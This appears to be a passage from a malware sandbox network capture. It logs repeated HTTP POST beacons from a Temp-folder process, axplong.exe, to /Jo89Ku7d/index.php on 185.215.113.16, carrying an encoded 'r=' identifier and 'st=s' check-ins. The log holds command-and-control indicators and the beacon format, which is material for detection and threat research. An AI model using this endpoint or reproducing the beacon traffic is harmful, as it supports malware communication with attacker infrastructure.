Sep 27, 2024 00:20:55.416555882 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:55.645129919 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49776	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:55.761641979 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:56.478044987 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:56.479207993 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:56.714613914 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49777	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:56.828372955 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:57.522582054 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:57.524230957 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:57.748241901 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49778	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:57.857064962 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:58.570982933 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:58.572108030 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:58.806097031 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49779	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:58.919629097 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:59.628705025 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:59.629519939 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:00.064815998 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Sep 27, 2024 00:21:00.067380905 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49781	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:00.216885090 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:00.914303064 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:21:00.915410995 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:01.140925884 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49782	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:01.266969919 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:01.967941046 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:21:01.972081900 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:02.199146032 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49783	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:02.431035042 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:03.129177094 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:21:03.134310007 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:03.425687075 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49784	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:03.546127081 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:04.234219074 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:21:04.234967947 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:04.457339048 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49785	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:04.576325893 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:05.702428102 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:21:05.702450991 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:21:05.703316927 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:05.929466009 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49786	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:06.045921087 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:06.760822058 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:21:06.764307976 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:06.991286039 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49787	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:07.107584000 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:07.815901041 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:21:07.816720963 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:08.058854103 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49788	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:08.172784090 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:08.906177998 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
